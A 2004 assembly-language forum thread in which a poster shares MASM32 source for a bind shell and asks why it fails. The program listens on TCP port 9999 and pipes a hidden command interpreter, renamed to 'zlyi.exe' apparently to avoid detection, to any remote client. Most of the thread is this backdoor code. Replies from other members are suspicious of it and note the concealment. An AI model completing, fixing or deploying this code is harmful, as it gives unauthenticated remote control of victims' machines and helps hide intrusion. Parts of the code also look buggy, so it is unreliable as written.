i write a programe that bind cmd.exe on 9999 port(come from nc.exe) ,but fail,who can help me?thank you!
.386
.model flat,stdcall
option casemap :none
include masm32includewindows.inc
include masm32includeuser32.inc
include masm32includekernel32.inc
include masm32includeshlwapi.inc
includelib masm32libshlwapi.lib
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
include masm32includewsock32.inc
includelib masm32libwsock32.lib

TCP_PORT equ 9999


BUFFER_SIZE equ 200
SESSION STRUCT
hReadPipe dd ?
hWritePipe dd ?
hProcess dd ?
sClientSocket SOCKET ?
hReadShellThread dd ?
hWriteShellThread dd ?
SESSION ENDS

.const
szCmd db "C:WINNTsystem32zlyi.EXE",0
szExit db "exit",0dh,0ah,0
szSuc db 'sucess',0 ;for debug
szErr1 db 'createprocess fail',0 ;for debug
szErr2 db 'accept fail',0 ;for debug
.data?
hShellStdinPipe dd ?
hShellStdoutPipe dd ?
hChildStdinRd dd ?
stSin sockaddr_in <?>
stSession SESSION <?>
stWsa WSADATA <?>
hSocket dd ?
hcSocket dd ?
.code

_StartShell proc uses ebx edi hShellStdin,hShellStdout
local @stProcessInformation:PROCESS_INFORMATION
local @stSi:STARTUPINFO
local @hProcess
mov @hProcess,NULL
mov @stSi.cb,sizeof STARTUPINFO
mov @stSi.lpReserved,NULL
mov @stSi.lpTitle,NULL
mov @stSi.lpDesktop,NULL
mov @stSi.dwX,0
mov @stSi.dwY,0
mov @stSi.dwYSize,0
mov @stSi.wShowWindow,SW_HIDE
mov @stSi.lpReserved2,NULL
mov @stSi.cbReserved2,0
mov ebx,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov @stSi.dwFlags,ebx
push hShellStdout
pop @stSi.hStdOutput
push hShellStdin
pop @stSi.hStdInput
push hShellStdout
pop @stSi.hStdError

invoke CreateProcess,NULL,addr szCmd,NULL,NULL,TRUE,0,
NULL,NULL,addr @stSi,addr @stProcessInformation


mov edi,@stProcessInformation.hProcess
mov @hProcess,edi
invoke CloseHandle,@stProcessInformation.hThread


mov eax,@hProcess
ret

_StartShell endp

_CreateSession proc

local @stSecurityAttributes:SECURITY_ATTRIBUTES

invoke RtlZeroMemory,addr stSession,sizeof stSession


mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
xor eax,eax
mov @stSecurityAttributes.lpSecurityDescriptor,eax
mov @stSecurityAttributes.bInheritHandle,TRUE
invoke CreatePipe,addr stSession.hReadPipe,addr hShellStdoutPipe,
addr @stSecurityAttributes,0

.if eax==NULL
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.else
invoke CreatePipe,addr hShellStdinPipe,addr stSession.hWritePipe,
addr @stSecurityAttributes,0
.if eax!=NULL

invoke _StartShell,hShellStdinPipe,hShellStdoutPipe
mov stSession.hProcess,eax
invoke CloseHandle,hShellStdinPipe
invoke CloseHandle,hShellStdoutPipe
mov eax,TRUE
ret
.endif
.endif

_CreateSession endp

_SessionReadShellThreadFn proc uses ebx ecx
local @Buffer:byte
local @Buffer2:byte
local @BytesRead
local @BytesToWrite
.while TRUE
invoke PeekNamedPipe,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,
addr @BytesRead,NULL,NULL
.break .if eax==NULL
.if @BytesRead>0
invoke ReadFile,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,
addr @BytesRead,NULL
.else
invoke Sleep,50
.continue
.endif
xor eax,eax
xor ecx,ecx
xor edx,edx
mov ebx,@BytesRead
.while ecx<ebx
mov al,@Buffer
.if al==0ah && ah!=0dh

mov @Buffer2,0dh
.endif

mov ah,@Buffer
mov @Buffer2,ah
inc edx
inc ecx
.endw
mov @BytesToWrite,edx
invoke send,stSession.sClientSocket,addr @Buffer2,@BytesToWrite,0
.break .if eax<=0
.endw
invoke ExitThread,0

_SessionReadShellThreadFn endp

_SessionWriteShellThreadFn proc uses ebx

local @RecvBuffer[1]:byte
local @Buffer:byte
local @EchoBuffer[5]:byte
local @BytesWritten
local @BufferCnt
local @EchoCnt
local @TossCnt
xor ebx,ebx
mov @TossCnt,ebx
mov @BufferCnt,ebx
.while TRUE
invoke recv,stSession.sClientSocket,@RecvBuffer,
sizeof @RecvBuffer,0
.break .if eax==NULL
mov ah,@RecvBuffer[0]
mov @Buffer,ah
inc ebx
.if ah==0dh
mov @Buffer,0ah
inc ebx
.endif
invoke StrCmpNI,addr @Buffer,addr szExit,6
.if eax==NULL
invoke ExitThread,0
.endif
mov ah,@RecvBuffer[0]
.if ah==0ah || ah==0dh

invoke WriteFile,stSession.hWritePipe,addr @Buffer,
ebx,addr @BytesWritten,NULL
.break .if eax==NULL
mov @BufferCnt,0

.endif
.endw

_SessionWriteShellThreadFn endp

_doexec proc uses ebx _hClientsocket

local @stSecurityAttributes:SECURITY_ATTRIBUTES
local @ThreadId
local @HandleArray[3]

invoke _CreateSession

mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
mov @stSecurityAttributes.lpSecurityDescriptor,NULL
mov @stSecurityAttributes.bInheritHandle,FALSE
mov ebx,_hClientsocket
mov stSession.sClientSocket,ebx
invoke CreateThread,addr @stSecurityAttributes,0,
_SessionReadShellThreadFn,NULL,0,
addr @ThreadId
mov stSession.hReadShellThread,eax
.if eax==NULL

mov stSession.sClientSocket,INVALID_SOCKET
mov eax,FALSE
ret
.endif
invoke CreateThread,addr @stSecurityAttributes,0,
_SessionWriteShellThreadFn,NULL,0,
addr @ThreadId
mov stSession.hWriteShellThread,eax
.if eax==NULL

mov stSession.sClientSocket,INVALID_SOCKET
invoke TerminateThread,stSession.hWriteShellThread,0
mov eax,FALSE
ret
.endif
push stSession.hReadShellThread
pop @HandleArray[0]
push stSession.hWriteShellThread
pop @HandleArray[1]
push stSession.hProcess
pop @HandleArray[2]
invoke WaitForMultipleObjects,3,addr @HandleArray,FALSE,INFINITE
.if eax==WAIT_OBJECT_0+0
invoke TerminateThread,stSession.hWriteShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+1
invoke TerminateThread,stSession.hReadShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+2
invoke TerminateThread,stSession.hReadShellThread,0
invoke TerminateProcess,stSession.hWriteShellThread,0

.endif
invoke closesocket,stSession.sClientSocket
invoke DisconnectNamedPipe,stSession.hReadPipe
invoke CloseHandle,stSession.hReadPipe
invoke DisconnectNamedPipe,stSession.hWritePipe
invoke CloseHandle,stSession.hWritePipe
invoke CloseHandle,stSession.hReadShellThread
invoke CloseHandle,stSession.hWriteShellThread
invoke CloseHandle,stSession.hProcess
mov eax,TRUE
ret

_doexec endp
start:
invoke WSAStartup,101h,addr stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov hSocket,eax
invoke RtlZeroMemory,addr stSin,sizeof stSin
invoke htons,TCP_PORT
mov stSin.sin_port,ax
mov stSin.sin_family,AF_INET
mov stSin.sin_addr,INADDR_ANY
invoke bind,hSocket,addr stSin,sizeof stSin
invoke listen,hSocket,1
.if eax==SOCKET_ERROR
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.endif

.while TRUE
invoke accept,hSocket,NULL,NULL
.if eax==INVALID_SOCKET
invoke MessageBox,NULL,addr szErr2,NULL,MB_OK or MB_ICONWARNING

jmp exit
.else

mov hcSocket,eax
invoke _doexec,hcSocket
.endif
.endw
exit:
invoke closesocket,hSocket
invoke closesocket,hcSocket
invoke WSACleanup
invoke ExitProcess,NULL

end start
Posted on 2004-08-16 03:51:41 by
for security,i change cmd.exe into zlyi.exe
Posted on 2004-08-16 03:53:04 by
Hrm, "for security" - you mean so people won't see cmd.exe in their process list and realize they're running shellcode?
Posted on 2004-08-16 06:07:31 by f0dder
When I write a program, I write it part by part and test it part by part. But in your case, you wrote an entire program (so you exactly know what you are doing else you couldn't write it), but you have not the slightest idea why it doesn't work. interesting...
Posted on 2004-08-16 06:30:28 by Mbee
some shellcode need cmd.exe net.exe,or net1.exe ,so i change it.
i have debuged....
Posted on 2004-08-16 19:14:59 by